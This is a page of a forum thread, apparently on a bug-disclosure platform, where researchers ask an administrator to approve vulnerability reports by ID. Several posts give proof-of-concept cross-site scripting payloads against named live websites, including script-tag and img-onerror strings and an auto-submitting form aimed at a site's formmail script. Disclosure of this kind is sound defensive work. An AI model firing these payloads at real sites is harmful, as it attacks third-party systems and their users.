Page 447 of 465
Re: Manual Approval Thread
Posted: Sun Mar 07, 2021 12:04 pm
by gabrielbc2013
Hello administrator, how are you?
Can you approve this report?
ID: 1942173
Thank you very much for your attention!
Re: Manual Approval Thread
Posted: Tue Mar 09, 2021 4:01 am
by x1admin
approved
Re: Manual Approval Thread
Posted: Tue Mar 09, 2021 2:02 pm
by amlnspqr
1939986 - click the fb button
Re: Manual Approval Thread
Posted: Tue Mar 09, 2021 3:20 pm
by JonLaing4
Hello, please approve ID 1945783
Visiting the url
https://www.pap.fr/bailleur/calcul-revi ... NBUGBOUNTY') &jour_signature=1&loyer=&mois_signature=1&submit=1 and then clicking in the box marked as 'Votre E-mail :' will trigger XSS as per screenshot.
Re: Manual Approval Thread
Posted: Wed Mar 10, 2021 12:32 pm
by JonLaing4
Hello, please the following ID's:
1946361 The payload '-->"></script><script>alert(1)</script>"> can be entered into the search box on the url
https://jobs.world.edu/ and you will get the following xss triggered.
- Screenshot from 2021-03-10 12-30-36.png (75.44KiB)Viewed 1995 times
1946360 The payload '">><marquee><img src=x onerror=confirm(1)></marquee>"> can be entered into the Ask Questions fields and after selecting a category and pressing the 'Ask' button the xss will be triggered
- Screenshot from 2021-03-10 12-31-56.png (54.55KiB)Viewed 1995 times
- Screenshot from 2021-03-10 12-32-13.png (50.42KiB)Viewed 1995 times
Many thanks,
Re: Manual Approval Thread
Posted: Wed Mar 10, 2021 4:19 pm
by JonLaing4
Hello please approve ID 1946511.
You can get xss with following data:
data:text/html,<!-- --><form method='POST' action='http%3A%2F%2Fwww.gongol.net%2Fcgi-sys%2Fformmail.pl'><input name='email' value='speedinquiries%40gongol.net'><input name='env_report' value='REMOTE_HOST'><input name='recipient' value='internetsales%40gongol.net'><input name='redirect' value='http%3A%2F%2Fwww.gongol.net%2F'><input name='reply%20email' value=''><input name='required' value='%26lt%3Bimg%20src%3Dx%20onerror%3Dalert%28%29%20'><input name='send%20this%20person%20an%20e-mail%20telling%20them%20where%20to%20find' value=''><input name='subject' value='Speed%20request%20for%20information'></form><script>document.forms[0].submit()</script>
When page automatically refreshes you get the xss triggered:
- Screenshot from 2021-03-10 15-54-52.png (27.35KiB)Viewed 1986 times
This is a problem with the formmail.py configuration with the site.
Re: Manual Approval Thread
Posted: Thu Mar 11, 2021 1:42 pm
by JonLaing4
Hello,
Please approve ID 1947591.
You can add the payload </script><script>alert(1)</script>"> into the search fields and it will trigger xss.
- Screenshot from 2021-03-11 13-42-53.png (8.49KiB)Viewed 1940 times
- Screenshot from 2021-03-11 13-43-04.png (53.11KiB)Viewed 1940 times
Many thanks
Re: Manual Approval Thread
Posted: Fri Mar 12, 2021 8:10 am
by dtulupov
Hello, please (Improper Access Control (IAC):
1947620
1947623
1947624
1947625
1947626
1947638
1947641
Re: Manual Approval Thread
Posted: Sun Mar 14, 2021 4:51 pm
by PC_Mechanic
Hi Admin
Please approve 1922509
This is 100% reproduceable
Re: Manual Approval Thread
Posted: Mon Mar 15, 2021 6:37 am
by x1admin
approved